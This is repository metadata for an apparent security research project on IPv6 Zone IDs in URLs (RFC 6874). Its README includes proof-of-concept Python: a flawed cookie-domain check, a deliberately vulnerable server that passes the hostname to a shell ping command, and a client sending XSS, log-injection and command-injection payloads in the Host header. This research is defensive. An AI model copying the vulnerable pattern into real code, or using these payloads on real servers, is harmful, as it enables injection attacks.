{"id":26248032,"url":"https://github.com/mauricelambert/urlipv6zoneidsecurity","last_synced_at":"2025-03-13T14:16:45.041Z","repository":{"id":280150077,"uuid":"941128025","full_name":"mauricelambert/UrlIPv6ZoneIdSecurity","owner":"mauricelambert","description":"Research about few security problems and bugs caused by the host element for modern URI.","archived":false,"fork":false,"pushed_at":"2025-03-01T15:03:57.000Z","size":25,"stargazers_count":0,"open_issues_count":0,"forks_count":0,"subscribers_count":1,"default_branch":"main","last_synced_at":"2025-03-01T16:18:46.451Z","etag":null,"topics":["bugs","cybersecurity","exploit","research","rfc","uri"],"latest_commit_sha":null,"homepage":"","language":null,"has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mauricelambert.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2025-03-01T15:00:01.000Z","updated_at":"2025-03-01T15:08:59.000Z","dependencies_parsed_at":"2025-03-01T16:18:48.317Z","dependency_job_id":"75bff24b-153e-4b92-9934-12898afbba3e","html_url":"https://github.com/mauricelambert/UrlIPv6ZoneIdSecurity","commit_stats":null,"previous_names":["mauricelambert/urlipv6zoneidsecurity"],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mauricelambert%2FUrlIPv6ZoneIdSecurity/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mauricelambert","download_url":"https://codeload.github.com/mauricelambert/UrlIPv6ZoneIdSecurity/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243419124,"owners_count":20287806,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bugs","cybersecurity","exploit","research","rfc","uri"],"created_at":"2025-03-13T14:16:44.129Z","updated_at":"2025-03-13T14:16:45.021Z","avatar_url":"https://github.com/mauricelambert.png","language":null,"funding_links":[],"categories":[],"sub_categories":[],"readme":"# RFC 6874 - IPv6 Zone ID in URL\r\n\r\n## Summary\r\n\r\nThe [RFC 6874 - Representing IPv6 Zone Identifiers in Address Literals and Uniform Resource Identifiers](https://www.ietf.org/rfc/rfc6874.txt) add the support for [RFC 4007 - IPv6 Scoped Address Architecture](https://www.ietf.org/rfc/rfc4007.txt) in URI.\r\n\r\nI think this RFC can generate few security problems and bugs because the ZoneID can contains many characters.\r\n\r\n## Context\r\n\r\nThe [RFC 3986 - Uniform Resource Identifier (URI): Generic Syntax](https://www.ietf.org/rfc/rfc3986.txt) use [RFC 3513 - Internet Protocol Version 6 (IPv6) Addressing Architecture](https://www.ietf.org/rfc/rfc3513.txt) to define the IPv6 as following:\r\n\r\n```\r\n IPv6address =                            6( h16 \":\" ) ls32\r\n                  /                       \"::\" 5( h16 \":\" ) ls32\r\n                  / [               h16 ] \"::\" 4( h16 \":\" ) ls32\r\n                  / [ *1( h16 \":\" ) h16 ] \"::\" 3( h16 \":\" ) ls32\r\n                  / [ *2( h16 \":\" ) h16 ] \"::\" 2( h16 \":\" ) ls32\r\n                  / [ *3( h16 \":\" ) h16 ] \"::\"    h16 \":\"   ls32\r\n                  / [ *4( h16 \":\" ) h16 ] \"::\"              ls32\r\n                  / [ *5( h16 \":\" ) h16 ] \"::\"              h16\r\n                  / [ *6( h16 \":\" ) h16 ] \"::\"\r\n\r\n      ls32        = ( h16 \":\" h16 ) / IPv4address\r\n                  ; least-significant 32 bits of address\r\n\r\n      h16         = 1*4HEXDIG\r\n                  ; 16 bits of address represented in hexadecimal\r\n```\r\n\r\nThe RFC 4007 define the support for a `ZoneID` concatened to IPv6 address format and the RFC 6874 update the RFC 3986 to support the `ZoneID` definition as following format:\r\n\r\n```\r\nIPv6addrz = IPv6address \"%25\" ZoneID\r\n```\r\n\r\n## Problems\r\n\r\nThe `host` element URI is an important element and is used for many usages:\r\n\r\n - Define where cookie or credentials should be sent\r\n - `Host` header in HTTP\r\n - *hostname* to identify server in logs (for example for a proxy)\r\n - Maybe in some web page\r\n - In unsecure code evaluated\r\n\r\n### Why\r\n\r\n - For many developpers the *hostname* is trust because: the hostname is very simple and the variety of characters is limited and does not include special characters.\r\n - But it's false: we have the `IPvFuture` format (define in RFC 3986):\r\n\r\n```\r\nIPvFuture  = \"v\" 1*HEXDIG \".\" 1*( unreserved / sub-delims / \":\" )\r\n```\r\n\r\n - And we have the IPv6 with `ZoneID` format define in RFC 6874.\r\n\r\n## POC and simplified examples\r\n\r\n### Send a cookie\r\n\r\n```python\r\nfrom urllib.parse import urlparse\r\nfrom fnmatch import fnmatch\r\nfrom typing import Tuple\r\n\r\ndef get_hostname_and_path(url: str) -\u003e Tuple[str, str]:\r\n    \"\"\"\r\n    This function returns hostname and path from an URL.\r\n    \"\"\"\r\n\r\n    parsed_url = urlparse(url)\r\n    hostname = parsed_url.hostname\r\n    path = parsed_url.path\r\n    return hostname, path\r\n\r\ndef cookie_validate(cookie_domain: str, cookie_path: str, url: str) -\u003e bool:\r\n    \"\"\"\r\n    This function checks for a cookie if you should add it to a request for an URL.\r\n    \"\"\"\r\n\r\n    hostname, path = get_hostname_and_path(url)\r\n\r\n    if hostname.endswith(cookie_domain) and path.startswith(cookie_path):\r\n        return True\r\n    return False\r\n\r\ncookie_domain = \"example.com\"\r\ncookie_path = \"/\"\r\n\r\nfor url in (\"http://example.com/\", \"http://google.com/\", \"http://[::1%example.com]/\"):\r\n    print(url, cookie_validate(cookie_domain, cookie_path, url))\r\n```\r\n\r\nThis weak example is vulnerable and produce the following output:\r\n\r\n```\r\nhttp://example.com/ True\r\nhttp://google.com/ False\r\nhttp://[::1%example.com]/ True\r\n```\r\n\r\n#### Exploitation\r\n\r\nThe [RFC 6265 - HTTP State Management Mechanism](https://www.rfc-editor.org/rfc/rfc6265) how cookie domain should match the URI host:\r\n\r\n```\r\n5.1.3.  Domain Matching\r\n\r\n   A string domain-matches a given domain string if at least one of the\r\n   following conditions hold:\r\n\r\n   o  The domain string and the string are identical.  (Note that both\r\n      the domain string and the string will have been canonicalized to\r\n      lower case at this point.)\r\n\r\n   o  All of the following conditions hold:\r\n\r\n      *  The domain string is a suffix of the string.\r\n\r\n      *  The last character of the string that is not included in the\r\n         domain string is a %x2E (\".\") character.\r\n\r\n      *  The string is a host name (i.e., not an IP address).\r\n```\r\n\r\nOkay, so *Host* define as IP address can't set cookie for next request... But clients and servers implements it.\r\n\r\n##### Implementations\r\n\r\nNow check if we can exploit in few implementations:\r\n\r\n1. Python and standard library (**not vulnerable**): Keep square brackets `[]` to validate the host ([code](https://github.com/python/cpython/blob/ddc27f9c385f57db1c227b655ec84dcf097a8976/Lib/http/cookiejar.py#L619)):\r\n\r\n```python\r\ncut_port_re = re.compile(r\":\\d+$\", re.ASCII)\r\ndef request_host(request):\r\n    \"\"\"Return request-host, as defined by RFC 2965.\r\n\r\n    Variation from RFC: returned value is lowercased, for convenient\r\n    comparison.\r\n\r\n    \"\"\"\r\n    url = request.get_full_url()\r\n    host = urllib.parse.urlparse(url)[1]\r\n    if host == \"\":\r\n        host = request.get_header(\"Host\", \"\")\r\n\r\n    # remove port, if present\r\n    host = cut_port_re.sub(\"\", host, 1)\r\n    return host.lower()\r\n```\r\n\r\n2. Go and standard library (**not vulnerable**): check for `:` or `%` in the Host ([code](https://cs.opensource.google/go/go/+/refs/tags/go1.24.0:src/net/http/client.go;l=1020;drc=6b605505047416bbbf513bba1540220a8897f3f6)):\r\n\r\n```go\r\nfunc isDomainOrSubdomain(sub, parent string) bool {\r\n    if sub == parent {\r\n        return true\r\n    }\r\n    // If sub contains a :, it's probably an IPv6 address (and is definitely not a hostname).\r\n    // Don't check the suffix in this case, to avoid matching the contents of a IPv6 zone.\r\n    // For example, \"::1%.www.example.com\" is not a subdomain of \"www.example.com\".\r\n    if strings.ContainsAny(sub, \":%\") {\r\n        return false\r\n    }\r\n    // If sub is \"foo.example.com\" and parent is \"example.com\",\r\n    // that means sub must end in \".\"+parent.\r\n    // Do it without allocating.\r\n    if !strings.HasSuffix(sub, parent) {\r\n        return false\r\n    }\r\n    return sub[len(sub)-len(parent)-1] == '.'\r\n}\r\n```\r\n\r\n3. python-requests (urllib3, **not vulnerable**): ZoneID is not really supported (when you perform request with ZoneID it try to resolve as a hostame)\r\n4. Ruby (**not vulnerable**): ZoneID is not supported\r\n\r\n### Injection\r\n\r\nThere is too many HTTP servers so i don't check for all implementations, module, plugins, web-app... But there is probably multiples vulnerables running servers.\r\n\r\nI write a minimal server and HTTP client for the demonstration:\r\n\r\n#### Server\r\n\r\n```python\r\nfrom typing import Dict, Tuple, List, Callable, Iterable, Union\r\nfrom wsgiref.simple_server import make_server, WSGIServer\r\nfrom io import TextIOWrapper, BufferedReader\r\nfrom wsgiref.util import FileWrapper\r\nfrom urllib.parse import urlparse\r\nfrom socket import AF_INET6\r\nfrom logging import warning\r\nfrom os import system\r\n\r\ntemplate = \"\"\"\u003c!DOCTYPE html\u003e\r\n\u003chtml\u003e\r\n\u003chead\u003e\r\n    \u003cmeta charset=\"utf-8\"\u003e\r\n    \u003cmeta name=\"viewport\" content=\"width=device-width, initial-scale=1\"\u003e\r\n    \u003ctitle\u003e\u003c/title\u003e\r\n\u003c/head\u003e\r\n\u003cbody\u003e\r\n    \u003ch1\u003eWelcome on {} !\u003c/h1\u003e\r\n\u003c/body\u003e\r\n\u003c/html\u003e\"\"\"\r\n\r\nclass WSGIServerIPv6(WSGIServer):\r\n    address_family = AF_INET6\r\n\r\ndef get_full_url(environ) -\u003e str:\r\n    \"\"\"\r\n    This function returns the full URL for a WSGI server.\r\n    \"\"\"\r\n\r\n    scheme = environ.get('wsgi.url_scheme', 'http')\r\n    host = environ.get('HTTP_HOST', environ.get('SERVER_NAME'))\r\n    path = environ.get('PATH_INFO', '')\r\n    query = environ.get('QUERY_STRING', '')\r\n    full_url = f\"{scheme}://{host}{path}\"\r\n    if query:\r\n        full_url += f\"?{query}\"\r\n    return full_url\r\n\r\ndef application(environ: Dict[str, Union[str, bool, BufferedReader, TextIOWrapper, FileWrapper, Tuple[int, int]]], start_response: Callable[str, List[Tuple[str, str]]]) -\u003e Iterable[bytes]:\r\n    \"\"\"\r\n    This function implements a minimal WSGI server for the POC.\r\n    \"\"\"\r\n\r\n    hostname = urlparse(get_full_url(environ)).hostname\r\n    response = template.format(hostname)\r\n    warning(\"Request for \" + hostname)\r\n    system(f'ping \"{hostname}\"')\r\n    status = '200 OK'\r\n    headers = [('Content-type', 'text/html')]\r\n    start_response(status, headers)\r\n    return [response.encode('utf-8')]\r\n\r\nif __name__ == '__main__':\r\n    with make_server('::1', 8000, application, WSGIServerIPv6) as httpd:\r\n        print(\"Serving on port 8000...\")\r\n        httpd.serve_forever()\r\n```\r\n\r\n#### Client\r\n\r\n```python\r\nimport socket\r\n\r\nfor payload in (\r\n    \"\u003cimg onerror=\\\"alert(1)\\\"\u003eHTML injection\",\r\n    \"log injection: malicious log !\",\r\n    \"code injection\\\" | echo \\\"Malicious payload\"\r\n):\r\n    s = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)\r\n    s.connect((\"::1\", 8000))\r\n    request = f\"GET / HTTP/1.1\\r\\nHost: [::1%{payload}]\\r\\n\\r\\n\".encode()\r\n    s.sendall(request)\r\n    response = True\r\n    while response:\r\n        response = s.recv(4096)\r\n        print(response.decode().strip())\r\n    s.close()\r\n```\r\n\r\n#### Demonstrations\r\n\r\n##### Server output\r\n\r\n```\r\n::1 - - [01/Mar/2025 14:25:32] \"GET / HTTP/1.1\" 200 252\r\nWARNING:root:Request for ::1%\u003cimg onerror=\"alert(1)\"\u003eHTML injection\r\nPing request could not find host ::1%\u003cimg onerror=alert(1)\u003eHTML injection. Please check the name and try again.\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 249\r\nWARNING:root:Request for ::1%log injection: malicious log !\r\nPing request could not find host ::1%log injection: malicious log !. Please check the name and try again.\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 241\r\nWARNING:root:Request for ::1%code injection\" | echo \"Malicious payload\r\n\"Malicious payload\"\r\n::1 - - [01/Mar/2025 14:26:29] \"GET / HTTP/1.1\" 200 252\r\n```\r\n\r\nWe have three vulnerabilities exploited: \r\n\r\n1. XSS (steal user or administrator sessions)\r\n2. Log injection (hide malicious events, RCE with PHP or templating system, ...)\r\n3. Code injection (execute malicious code, in my demonstration it's a system command but similar vulnerabilities can use any other syntax: PHP, SQL, Javascript, Python, ...)\r\n\r\n## Conclusion\r\n\r\n - **Don't trust any field including valid and parsed host or IP**\r\n - If you are a developper speak about these problems with your colleagues\r\n - If you are `DevSecOps` consider the *host* as an user input (even if you use a secure parser)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fmauricelambert%2Furlipv6zoneidsecurity/lists"}